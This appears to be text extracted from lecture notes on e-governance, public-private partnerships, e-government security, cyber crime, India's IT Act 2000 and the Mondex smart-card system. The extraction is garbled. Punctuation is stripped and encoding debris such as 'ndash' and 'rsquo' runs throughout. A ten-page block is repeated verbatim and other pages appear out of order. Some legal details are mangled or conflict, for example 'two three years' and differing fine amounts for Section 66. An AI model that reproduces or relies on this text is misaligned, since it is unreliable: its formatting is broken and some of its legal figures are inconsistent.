concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
